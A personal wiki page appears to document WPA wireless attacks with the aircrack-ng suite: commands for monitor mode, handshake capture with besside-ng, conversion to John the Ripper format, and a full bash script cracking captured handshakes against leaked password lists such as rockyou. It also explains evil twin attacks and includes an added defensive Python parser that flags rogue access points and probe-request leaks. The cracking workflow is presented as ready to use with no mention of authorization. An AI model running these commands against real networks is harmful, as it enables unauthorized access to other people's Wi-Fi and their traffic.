Kali/Wireless Reboot: Difference between revisions
From charlesreid1
Revision as of 19:07, 18 August 2016
Reboot
Revisiting some of the old techniques.
Classic WPA Cracking
Monitor wireless
First, use the aircrack-ng suite to monitor wifi networks.
Start by putting the wifi card in monitor mode:
$ ifconfig wlan1 down; iwconfig wlan1 mode monitor; ifconfig wlan1 up
Now you can use that interface to scan for wireless network activity:
$ airodump-ng -w output_file wlan1
This will output information about wireless network activity to a file.
Obtain handshakes
You can use airodump-ng to monitor wireless activity and verify that there are, in fact, clients connected to networks - a critical component in obtaining handshakes, since a WPA handshake is only captured when a client (re)associates. The next step is to use besside-ng to obtain handshakes the Joe Pesci way.
Specify -W for wpa only, and specify your network interface:
$ besside-ng -W wlan1
That will put handshakes in a cap file, and the name of networks whose handshakes were obtained in a log file.
Crack handshakes
Once we have the handshakes, use the instructions on the John the Ripper/WPA page to turn those cap files into hccap files, then into John the Ripper password files:
$ /root/codes/cap2hccap/cap2hccap.bin /root/box/08_besside/wpa.cap wpa.hccap
$ hccap2john ./wpa.hccap > booty.johnpw
Now the goal is to crack booty.johnpw with John the Ripper. To do this, we will need to try a variety of wordlists, and a variety of rulesets to modify the words in the wordlists. To do that, use a bash script:
#!/bin/bash
# bash, not sh: this script uses arrays
# seclist passwords located in
# ~/codes/SecLists/Passwords
#
johndir="/usr/sbin"
johnbin="${johndir}/john"
pwdir="/root/box/08_besside"

# Round 0: plain wordlists, no mangling rules
rulesets=("")
#### Round 1
###rulesets=("KoreLogicRulesAppendYears")
#### Round 2
###rulesets=("KoreLogicRulesAppendYears"
###           "KoreLogicRulesAppendNum"
###           "KoreLogicRulesPrependNum"
###           "KoreLogicRulesAppendNumNum"
###           "KoreLogicRulesPrependNumNum"
###           "KoreLogicRulesPrependYears"
###)

# a good selection of seclist passwords:
# phpbb.txt
# elitehacker.txt
# alleged-gmail-passwords.txt
# Sucuri_Top_Wordpress_Passwords.txt
# korelogic-password.txt
# hak5.txt
# rockyou.txt
wordlists=("/root/codes/SecLists/Passwords/phpbb.txt"
           "/root/codes/SecLists/Passwords/elitehacker.txt"
           "/root/codes/SecLists/Passwords/alleged-gmail-passwords.txt"
           "/root/codes/SecLists/Passwords/Sucuri_Top_Wordpress_Passwords.txt"
           "/root/codes/SecLists/Passwords/korelogic-password.txt"
           "/root/codes/SecLists/Passwords/hak5.txt"
           "/root/codes/SecLists/Passwords/rockyou.txt")

# ===========================
# The Actual Work
# Glob the directory directly instead of parsing ls output. If no .johnpw
# files exist the pattern stays literal, so check the file really exists.
for pwfile in "${pwdir}"/*.johnpw; do
    [ -e "${pwfile}" ] || { echo "No .johnpw files found in ${pwdir}"; exit 1; }
    echo ""
    echo ""
    echo "*** * * ** **** * ***** ** ** * * * ** ****"
    echo "* ** * *** **** *** * ** ** *** * * * *** *"
    echo " * ***** * * * * *** * * * * * *** * * *"
    echo "* * * * * * *** **** * *** * * * * * * *** *"
    echo ""
    echo ""
    echo "Now on password file ${pwfile}"
    echo ""
    for rules in "${rulesets[@]}"; do
        echo ""
        echo ""
        echo " .. . .. . .... ... . . ... .. . .. . . . ."
        echo "... ... .. ...... . .. . . . .... .... ."
        echo "... . .. . . . .. .... . . . . . ... . "
        echo ""
        echo ""
        echo "Now on ruleset ${rules}"
        echo ""
        for wordlist in "${wordlists[@]}"; do
            echo ""
            echo "---------------------------"
            echo "Running John the Ripper with options:"
            echo "Wordlist: ${wordlist}"
            echo "Ruleset: ${rules}"
            echo "Password File: ${pwfile}"
            if [ -z "${rules}" ]; then
                # print the command first, then run it from john's own directory
                # (a subshell, so the working directory is restored afterwards)
                echo "${johnbin} --wordlist=${wordlist} --format=wpapsk ${pwfile}"
                ( cd "${johndir}" && "${johnbin}" --wordlist="${wordlist}" --format=wpapsk "${pwfile}" )
            else
                echo "${johnbin} --wordlist=${wordlist} --format=wpapsk --rules=${rules} ${pwfile}"
                ( cd "${johndir}" && "${johnbin}" --rules="${rules}" --wordlist="${wordlist}" --format=wpapsk "${pwfile}" )
            fi
        done
    done
done
Settle in, because we'll be here a while.
Alternatives to Cracking WPA
So you don't wanna rent out a GPU box, spend a week trimming your fingernails, and spend the entire time hoping that somehow, magically, you'll nail the one-in-a-bazillion-million chance you'll get it. That's understandable. Let's talk about alternative options. These are going to depend primarily on your target network and your scenario. For example, what kind of physical access to the primary wireless networking area do you have? What kind of antenna(s) are you using?
Client Attacks: Evil Twin
Client attacks are essentially about tricking the client into connecting to you rather than to the real access point. This enables attacks like the evil twin, in which a client connects to what it recognizes as a known access point, but which is in fact a fake access point set up by an attacker. This is principally made possible by the information phones and laptops leak about wireless networks they have associated with previously. When you tell a device to remember a wireless network, it keeps broadcasting probe requests for those remembered network names, and that is what lets an attacker create an Evil Twin.
(This is similar to the idea behind the Hak5 Pineapple - creating an AP that automatically cycles through a whole bunch of network names that were collected from this prior association data, in an attempt to get phones to automatically connect to the device and pass along an (encrypted) handshake.)
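As an added example (not from the original page), here is a small defender-side parser for 802.11 beacon and probe-request frames: it flags a trusted SSID being advertised by an unknown BSSID (an evil twin) and reports which remembered networks a client is leaking in its directed probe requests. The frame bytes, MAC addresses and SSIDs are constructed for the demo, and a real deployment would feed it frames from a monitor-mode capture.

```python
from collections import defaultdict
MGMT_HDR_LEN, BEACON, PROBE_REQ, SSID_TAG = 24, 0x8, 0x4, 0   # header: fc(2) dur(2) addr1-3(18) seq(2)

def mac(b):
    return ':'.join(f'{x:02x}' for x in b)

def parse_mgmt(frame):
    """Return (subtype, src, bssid, ssid) for a beacon or probe request, else None."""
    if len(frame) < MGMT_HDR_LEN or frame[0] & 0x0c or frame[0] >> 4 not in (BEACON, PROBE_REQ):
        return None                      # too short, not a management frame, or a subtype we ignore
    subtype, src, bssid = frame[0] >> 4, mac(frame[10:16]), mac(frame[16:22])
    body = frame[MGMT_HDR_LEN + (12 if subtype == BEACON else 0):]   # beacons: timestamp+interval+cap first
    ssid, i = None, 0
    while i + 2 <= len(body):            # walk the tagged parameters (IEs)
        tag, ln = body[i], body[i + 1]
        if i + 2 + ln > len(body):       # truncated IE: stop rather than read past the frame
            break
        if tag == SSID_TAG:
            ssid = body[i + 2:i + 2 + ln].decode('utf-8', 'replace')
            break
        i += 2 + ln
    return subtype, src, bssid, ssid

def find_evil_twins(frames, trusted):
    """trusted maps SSID -> set of legitimate BSSIDs; flag any other BSSID beaconing that SSID."""
    alerts = set()
    for p in map(parse_mgmt, frames):
        if p and p[0] == BEACON and p[3] in trusted and p[2] not in trusted[p[3]]:
            alerts.add((p[3], p[2]))
    return sorted(alerts)

def probed_ssids(frames):
    """Remembered networks each client leaks through directed probe requests."""
    leaks = defaultdict(set)
    for p in map(parse_mgmt, frames):
        if p and p[0] == PROBE_REQ and p[3]:   # empty SSID is a wildcard probe, not a leak
            leaks[p[1]].add(p[3])
    return {client: sorted(s) for client, s in leaks.items()}

def build_frame(subtype, src, bssid, ssid):
    """Constructed test frame (not a real capture): minimal header, fixed fields, SSID IE."""
    hdr = bytes([subtype << 4, 0, 0, 0]) + b'\xff' * 6 + src + bssid + b'\x00\x00'
    fixed = (b'\x00' * 8 + b'\x64\x00' + b'\x11\x04') if subtype == BEACON else b''
    return hdr + fixed + bytes([SSID_TAG, len(ssid)]) + ssid.encode()

AP_REAL, AP_ROGUE = b'\x00\x11\x22\x33\x44\x55', b'\x66\x77\x88\x99\xaa\xbb'   # made-up MACs
CLIENT, BCAST = b'\xde\xad\xbe\xef\x00\x01', b'\xff' * 6
SAMPLE = [build_frame(BEACON, AP_REAL, AP_REAL, 'CoffeeShop'),
          build_frame(BEACON, AP_ROGUE, AP_ROGUE, 'CoffeeShop'),   # second BSSID beaconing a trusted SSID
          build_frame(PROBE_REQ, CLIENT, BCAST, 'HomeWifi')]       # client probing for a saved network
TRUSTED = {'CoffeeShop': {mac(AP_REAL)}}
```

Running `find_evil_twins(SAMPLE, TRUSTED)` reports the rogue BSSID for CoffeeShop, and `probed_ssids(SAMPLE)` shows the client revealing HomeWifi, which is exactly the leak the paragraph above describes.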
Flags